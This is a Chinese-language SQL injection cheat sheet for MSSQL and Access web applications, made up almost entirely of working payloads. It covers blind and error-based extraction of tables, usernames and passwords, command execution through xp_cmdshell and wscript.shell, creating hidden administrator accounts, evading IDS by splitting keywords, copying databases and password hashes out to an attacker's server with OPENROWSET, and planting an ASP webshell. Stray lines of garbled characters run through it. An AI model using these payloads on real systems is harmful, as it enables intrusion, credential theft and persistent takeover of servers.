1. 判断有无注入点
 and 1=1        -- 应返回正常页面
 and 1=2        -- 应返回出错或不同的页面
这两条要分开提交,只有两次结果有差异才说明参数被带进了 SQL(布尔盲注的判断依据)。字符型参数要先闭合引号,如 ' and '1'='1 与 ' and '1'='2。
2. 猜表名。一般的表名无非是 admin、adminuser、user、pass、password 等。
 and 0<>(select count(*) from 表名)
 and 0<>(select count(*) from admin)   ---判断是否存在 admin 这张表
注意:表不存在时语句报错、返回错误页面;表存在但是空表时 count(*)=0,同样返回错误页面。只想判断表存不存在,用 and (select count(*) from admin)>=0 更可靠(空表也为真,表不存在才报错)。
3. 猜帐号数目。如果 0< 返回正确页面而 1< 返回错误页面,说明帐号数目就是 1 个:
 and 0<(select count(*) from admin)
 and 1<(select count(*) from admin)
猜列名还可以用 and (select count(列名) from 表名)>0 ,列不存在会报错;注意 count(列名) 不统计 NULL 值,该列全为 NULL 时也会返回错误页面。
4. 猜解字段名称。在 len( ) 括号里填上猜测的字段名,字段不存在语句会报错:
 and 1=(select count(*) from admin where len(猜测的字段名)>0)--
 and 1=(select count(*) from admin where len(name)>0)        --用户名字段
 and 1=(select count(*) from admin where len(password)>0)    --密码字段
注意:len(*) 不是合法写法;1=(select count(*) ...) 只在恰好一行匹配时为真,表里不止一行时应写成 (select count(*) from admin where len(name)>0)>0。
5. 猜解各个字段的长度。把 >0 里的数字逐步变换,直到返回正确页面为止:
 and 1=(select count(*) from admin where len(name)>6)       错误
 and 1=(select count(*) from admin where len(name)>5)       正确 → 长度是 6
 and 1=(select count(*) from admin where len(name)=6)       正确

 and 1=(select count(*) from admin where len(password)>11)  正确
 and 1=(select count(*) from admin where len(password)>12)  错误 → 长度是 12
 and 1=(select count(*) from admin where len(password)=12)  正确
猜长度还可以用 and (select top 1 len(username) from admin)>5 。没有 order by 时 top 1 取到哪一行是不确定的,多行表要加 order by 固定目标行;用二分法(先 >8,再 >4 或 >12)可以大幅减少请求次数。
6. 猜解字符。一次加一个字符地猜,猜满前面得到的长度,帐号就出来了:
 and 1=(select count(*) from admin where left(name,1)='a')   ---猜解用户帐号的第一位
 and 1=(select count(*) from admin where left(name,2)='ab')  ---猜解用户帐号的前两位
注意:默认排序规则下字符串比较不区分大小写,要区分大小写就按字符编码比较。

猜内容还可以按字符编码来算(配合二分法更快):
 and (select top 1 ascii(substring(password,1,1)) from admin)>50
 and 1=(select top 1 count(*) from Admin where ascii(substring(pass,5,1))=51) --
原文的 asc()/mid() 是 Access 写法,SQL Server 用 ascii()/substring()。ascii() 只返回单字节,要猜中文等非 ASCII 字符得用 unicode(substring(...)) 取 Unicode 码(原文"ASSIC码"是 ASCII 的笔误),最后再把数字换算回字符。
利用 group by 报错枚举列名(需要页面回显数据库错误信息):
 ' group by users.id having 1=1--
 ' group by users.id, users.username, users.password, users.privs having 1=1--
每次报错都会指出下一个没出现在 group by 里的列名,把它补进去再提交,直到不再报错,就得到全部列名和顺序。知道列的个数和顺序后就能插入记录:
 '; insert into users values( 666, 'attacker', 'foobar', 0xffff )--
' UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
' UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id')--
' UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id','login_name')--
' UNION SELECT TOP 1 login_name FROM logintable--
' UNION SELECT TOP 1 password FROM logintable WHERE login_name='Rahul'--
(原文的"列名"即 COLUMN_NAME;第二、三条里出现两个 WHERE 是笔误,第二个条件要用 AND 连接;注释符要写完整的 --。这种写法通常不是靠 UNION 正常显示结果,而是把字符串 UNION 到原查询的整数列上,让类型转换报错把列名/口令带出来;如果页面不回显错误,就得先用 order by n 找出列数并让列数、类型对齐。)
6 e) b# o, q# v# |! C5 a看服务器打的补丁=出错了打了SP4补丁 * {- o' K; o# Q1 N7 ~
and 1=(select @@VERSION)--
: G( Q7 a2 f E# c7 N1 N6 T
看数据库连接帐号的权限。返回正常,证明当前登录属于服务器角色 sysadmin:
 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--
(IS_SRVROLEMEMBER 是成员时返回 1,不是成员返回 0,角色名无效返回 NULL;角色名必须加引号。)

判断连接数据库的帐号(用 sa 连接时,返回正常=连接帐号是 sa):
 and 'sa'=(SELECT system_user)--
 and user_name()='dbo'--
 and 0<>(select user_name())--
最后一条是把整数和 nvarchar 比较,靠转换报错把当前用户名直接回显出来(原文少了一个右括号)。
看 xp_cmdshell 是否被删除:
 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell')--
注意:SQL Server 2005 起 xp_cmdshell 默认存在但处于禁用状态,存在不等于可用,需要 sysadmin 通过 sp_configure 开启。

xp_cmdshell 被删除后的恢复(支持绝对路径)。需要 sysadmin 权限,且 xplog70.dll 必须存在于服务器上——第二种写法用的是事先传到网站目录里的 dll。sp_addextendedproc 已被标为废弃,只对旧版本有效:
 ;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
 ;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--
反向 PING 自己实验(盲注时验证能否执行系统命令:在自己的机器上抓 ICMP 包,192.168.0.1 换成自己的 IP):
 ;use master;declare @s int;exec sp_oacreate 'wscript.shell',@s out;exec sp_oamethod @s,'run',NULL,'cmd.exe /c ping 192.168.0.1';exec sp_oadestroy @s;--
sp_OA* 系列过程只有 sysadmin 能执行,SQL Server 2005 起还要先开启 "Ole Automation Procedures";命令以 SQL Server 服务帐号的身份运行,用完应 sp_oadestroy 释放对象。

加帐号(net user 要成功,服务帐号需要本机管理员权限;帐号名带 $ 只是在部分列表里不显示,并不能躲过审计):
 ;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
创建一个指向 E 盘的虚拟目录(mkwebdir.vbs、chaccess.vbs 是 IIS 自带的管理脚本,通常在 C:\Inetpub\AdminScripts\ 下;原文写在 wwwroot 是事先复制过去的):
 ;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"'--

修改访问属性(配合写入一个 webshell,给虚拟目录加上可浏览权限):
 ;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'--
MSSQL 也可以用联合查询。先用 order by n 或逐个加列确定原查询的列数;id=-1 让原查询不返回行,UNION 的结果才会显示出来;对应列的类型要能互相转换:
 ?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
 ?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin   (union 在 Access 里也好用)
爆库的特殊技巧(仅对 Access 后台且页面回显错误时有效):把 URL 中最后一个 / 换成 %5c(即 \ )后提交,Jet 引擎解析不了这个路径时会报错,错误信息里带出 .mdb 数据库文件的绝对路径。
得到 WEB 路径
先建一张表,再靠类型转换报错把字段内容读出来(把 char 值和整数 1 比较会报错并回显该值):
 ;create table [dbo].[swap] ([swappass][char](255));--
 and (select top 1 swappass from swap)=1--
从注册表读 IIS 虚拟根目录。原文 values=@test 应为 @value=@test,插入的表名/列名也要和建表语句一致;varchar(20) 放不下路径,和表一样用 varchar(500):
 ;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(500) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', @value=@test OUTPUT insert into newtable(paths) values(@test)--
 ;use ku1;--                        切换到目标库
 ;create table cmd (str image);--   建立 image 类型的表 cmd
存在 xp_cmdshell 时的测试过程(都需要 sysadmin;SQL Server 2005 起还要先用 sp_configure 开启 xp_cmdshell):
 ;exec master..xp_cmdshell 'dir'
 ;exec master.dbo.sp_addlogin 'jiaoniang$';--                     加 SQL 帐号
 ;exec master.dbo.sp_password null,'1866574','jiaoniang$';--      参数顺序是 旧口令,新口令,登录名;原文把后两个写反了
 ;exec master.dbo.sp_addsrvrolemember 'jiaoniang$','sysadmin';--  两个参数之间要有逗号
 ;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
 ;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--
 exec master..xp_servicecontrol 'start','schedule'                启动计划任务服务
 exec master..xp_servicecontrol 'start','server'
 ;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'
 ;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add'
 ; exec master..xp_cmdshell 'tftp -i 你的IP get file.exe'--        利用 TFTP 上传文件(-i 为二进制模式;要求服务器能主动连到你的 TFTP 服务,且 tftp 客户端存在)
用变量拼接绕过 IDS 的关键字检测:
 ;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
 ;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
把当前库备份到自己的共享目录(原文 declare @a 少了类型;SQL Server 服务帐号要能写该 UNC 路径):
 ;declare @a sysname;set @a=db_name();backup database @a to disk='\\你的IP\你的共享目录\bak.dat'
如果当前连接帐号权限受限,而 sa 口令为空或已知,可以用 OPENROWSET 以 sa 身份重新连接本机执行(SQL Server 2005 起需开启 Ad Hoc Distributed Queries):
 select * from openrowset('sqloledb','服务器名';'sa';'sa口令','select ''OK!''; exec master.dbo.sp_addlogin hax')
查询构造:
 SELECT * FROM news WHERE id=... AND topic=... AND .....
在登录表单的用户名处提交下面的内容(先闭合前面的引号,结尾留一个 ' 给原语句收尾),逐位猜 victim 的口令:
 admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,1),1)='1') and userpass <> '
 ';select 123;--
 ';use master;--
 ' or name like 'fff%';--     返回正常说明有一个名字以 fff 开头(例如 ffff)的用户
 and 1<>(select count(email) from [user]);--
 ;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
 ;update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--
 ;update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
 ;update [users] set email=(select top 1 count(id) from password) where name='ffff';--
 ;update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
 ;update [users] set email=(select top 1 name from password where id=2) where name='ffff';--
上面的语句是把数据库中第一个用户表的表名写进 ffff 用户的邮箱字段,通过查看 ffff 的用户资料就知道第一个用户表叫 ad;然后根据表名 ad 得到它的 id,再取 id 大于它的第一个表,就是第二个表的名字,依此类推。注意这些 update 会改写目标站点的数据,只在授权测试且能够恢复时使用。
用 char() 拼出字符串,避免在 payload 里出现引号(下面拼出的是 chris):
 insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
 insert into users values( 667,123,123,0xffff)--
 insert into users values ( 123, 'admin--', 'password', 0xffff)--
 and user>0                                   把 nvarchar 的 user 和整数比较,靠转换报错回显当前用户名
 and (select count(*) from sysobjects)>0      返回正常说明是 SQL Server
 and (select count(*) from msysobjects)>0     返回正常说明是 Access(系统表名是 MSysObjects,原文拼错;Access 默认不允许读它,通常会返回错误)
枚举出数据表名
 ;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--
这是把第一个表名更新到 aaa 表的 aaa 字段(没有 where,会改写 aaa 表的全部行)。
读出第一个表后,第二个表可以这样读出来(在条件后加上 and name<>'刚才得到的表名'):
 ;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--
然后提交 id=1552 and exists(select * from aaa where aaa>5) ,把 varchar 的 aaa 和整数比较会报转换错误,表名就在错误信息里(id 取任意存在的记录即可)。
这样一个个地读,直到没有为止。
读字段是这样:
 ;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--
然后提交 id=1552 and exists(select * from aaa where aaa>5) 出错,得到第 1 个字段名;
 ;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--
再提交同样的语句出错,得到第 2 个字段名,依此类推。
[获得数据表名] 将某字段的值更新为表名,再想法读出这个字段的值就得到表名:
 update 表名 set 字段=(select top 1 name from sysobjects where xtype='u' and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条件]
也可以用 not in 一次排除多个已知表:
 select top 1 name from sysobjects where xtype='u' and status>0 and name not in('table1','table2',…)
通过 SQL Server 注入漏洞建数据库管理员帐号和系统管理员帐号时,当前连接帐号必须是 sysadmin 角色成员。

[获得数据表字段名] 将字段值更新为字段名,再想法读出这个字段的值就得到字段名:
 update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段序号,如 1)) [ where 条件]
绕过 IDS 的检测[把关键字拆开放进变量再 exec]
 ;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
 ;declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
1、 连接远程数据库
基本语法:
 select * from OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=123','select * from table1')
参数:(1) OLEDB 提供程序名;(2) 连接字符串;(3) 要在远端执行的查询。SQL Server 2005 起需先开启 Ad Hoc Distributed Queries。
2、 连接字符串里可以指定任意端口,比如:
 select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1')
3. 复制目标主机的整个数据库:语句在目标机上执行,把目标机的表逐个 insert 到你自己的 SQL Server(下面的 192.168.0.1)上。
基本语法:
 insert into OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=123','select * from table1') select * from table2
这条语句在目标机上执行,把目标机 table2 表的所有数据复制到 servername 上的 table1 表里(两表的列数和类型要一致)。连接字符串里的 sa/密码是你自己那台 SQL Server 的,目标机必须能主动连到你的 1433 端口(出站被防火墙拦住就不行)。实际运用中按需修改 IP 和端口,比如:
 insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from table2
 insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysdatabases') select * from master.dbo.sysdatabases
 insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysobjects') select * from user_database.dbo.sysobjects
 insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _syscolumns') select * from user_database.dbo.syscolumns
(_sysdatabases、_sysobjects、_syscolumns 是事先在自己服务器上按相同结构建好的接收表。)
复制数据库:
 insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table1') select * from database..table1
 insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from table2') select * from database..table2
复制口令哈希:SQL Server 2000 的登录口令 hash 存在 master.dbo.sysxlogins 里(原文写成 database.dbo.sysxlogins,应为 master;2005 起改为 sys.sql_logins 的 password_hash 列,需要 CONTROL SERVER 权限才能看到)。方法如下:
 insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from _sysxlogins') select * from master.dbo.sysxlogins
得到 hash 之后,就可以离线暴力破解。
遍历目录的方法:先创建一个临时表 temp。注意 insert ... exec 要求表的列数与扩展过程返回的结果集对得上,否则报错:
 ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
 ;insert temp exec master.dbo.xp_availablemedia;--                      获得当前所有驱动器(返回 4 列)
 ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--             获得子目录列表(返回 1 列)
 ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--        获得所有子目录的目录树结构并存入 temp 表(返回 subdirectory、depth 两列)
 ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--   查看某个文件的内容
 ;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
 ;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
 ;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc';--
 ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--        (xp_dirtree 在 SQL Server 2000 上 public 角色即可执行)
写进表以后,再用前面的报错或盲注方法把 temp 的内容逐行读出来。
判断当前登录属于哪些固定服务器角色(返回正常即是成员;原文此处标题"写入表"有误):
 语句1:and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
 语句2:and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
 语句3:and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
 语句4:and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
 语句5:and 1=(SELECT IS_SRVROLEMEMBER('processadmin'));--
 语句6:and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
 语句7:and 1=(SELECT IS_SRVROLEMEMBER('dbcreator'));--
 语句8:and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
 语句9:and 1=(SELECT IS_MEMBER('db_owner'));--   (数据库角色用 IS_MEMBER)
(原文第 5、7 条与第 4、8 条重复,这里补上漏掉的 processadmin 和 dbcreator,八个固定服务器角色就齐了。)
把路径写到表中去,再靠转换报错读出来:
 ;create table dirs(paths varchar(100), id int)--
 ;insert dirs exec master.dbo.xp_dirtree 'c:\'--
 and 0<>(select top 1 paths from dirs)--                                   varchar 与整数比较报错,回显第一个目录名
 and 0<>(select top 1 paths from dirs where paths not in('Inetpub'))--     排除已得到的目录名读下一个(原文的 @Inetpub 多了一个 @)
 ;create table dirs1(paths varchar(100), id int)--
 ;insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--                       原文写成 insert dirs,与上一句新建的 dirs1 不符
 and 0<>(select top 1 paths from dirs1)--
把数据库备份到网页目录,然后通过 HTTP 下载。备份文件由 SQL Server 服务帐号写入,该帐号要对目标目录有写权限;.bak 除数据外还有大量二进制头,要用 SQL Server 还原后才能看:
 ;declare @a sysname; set @a=db_name();backup database @a to disk='e:\web\down.bak';--
按 id 倒序取第 12 个用户表的表名(char(85)='U';把表名和整数 1 比较,靠转换报错回显):
 and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
 and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects)   参看相关表的第 1 列名
 and 1=(select user_id from USER_LOGIN)
 and 0=(select [user] from USER_LOGIN where [user]>1)      (user 是保留字,列名要加方括号)
-=- wscript.shell example -=-
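-- wscript.shell example: launch notepad.exe on the database server through OLE automation.
-- sp_OA* procedures are sysadmin-only; on SQL Server 2005+ 'Ole Automation Procedures' must
-- also be enabled. The process runs under the SQL Server service account, not the web user.
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
-- Release the COM object; the original left it allocated for the rest of the batch.
exec sp_oadestroy @o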
同一段的单行堆叠查询写法(字符串参数都要加引号):
 ; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--
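-- Dump a text file on the database server line by line through Scripting.FileSystemObject
-- and PRINT it. Same prerequisites as the wscript.shell example: sysadmin, and on 2005+
-- 'Ole Automation Procedures' enabled. The path is only a sample; anything readable by the
-- SQL Server service account can be read this way.
declare @o int, @f int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
-- opentextfile(path, iomode): 1 = ForReading
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
-- sp_OAMethod returns 0 on success; reading past end of file makes readline fail, which ends the loop.
while( @ret = 0 )
begin
    print @line
    exec @ret = sp_oamethod @f, 'readline', @line out
end
-- Close the stream and release both COM objects (the original never did; it also declared an unused @t).
exec sp_oamethod @f, 'close'
exec sp_oadestroy @f
exec sp_oadestroy @o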
T. n5 ?# W) h, E& A5 v1 B0 R
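-- Write an ASP page under the web root through Scripting.FileSystemObject.
-- The page runs whatever arrives in its ?cmd= query string (a webshell); it is only
-- meaningful inside an authorised test and must be removed afterwards.
-- Prerequisites as above; the SQL Server service account needs write access to the web root.
declare @o int, @f int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
-- createtextfile(path, overwrite): 1 = overwrite an existing file
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'
-- Close and release; without close the file stays open until the COM object is torn down.
exec sp_oamethod @f, 'close'
exec sp_oadestroy @f
exec sp_oadestroy @o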
2 j6 s, _7 F, L% Z2 m8 y
4 ^+ r8 [4 w$ U4 \declare @o int, @ret int . s, \% |1 R3 q5 _) E- g
exec sp_oacreate speech.voicetext, @o out . k9 i# f" k k5 w9 d j# ^
exec sp_oamethod @o, register, NULL, foo, bar
0 P) i7 }4 u( J2 I9 a$ ^exec sp_oasetproperty @o, speed, 150
/ i0 w3 [' J9 H/ n& l" n$ Lexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 / I# h- I6 Z+ T! ^& ]% F) @$ F V
waitfor delay 00:00:05 / ]3 I0 ]/ x; f3 K' F }
* g* u& z4 p+ i, ?: F: s# A
 ; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--
3 Z, o. w& h9 Z/ s9 f! j4 W6 n
xp_dirtree 在 SQL Server 2000 上 public 角色即可执行。
 exec master.dbo.xp_dirtree 'c:\'
返回的结果有两个字段:subdirectory(字符型)和 depth(整型);如果传了第三个参数(同时列出文件),结果会多出第三列 file。
 create table dirs(paths varchar(100), id int)
建表时列数和类型要和 xp_dirtree 返回的结果集一一对应:这里 paths 对应 subdirectory,id 对应 depth。
 insert dirs exec master.dbo.xp_dirtree 'c:\'
只要建的表与存储过程返回的结果集列数相等、类型兼容,insert ... exec 就能执行,达到写表的效果;再把表的内容读出来,一步步拿到想要的信息。
0 t5 P, a0 A8 e/ F& x7 S |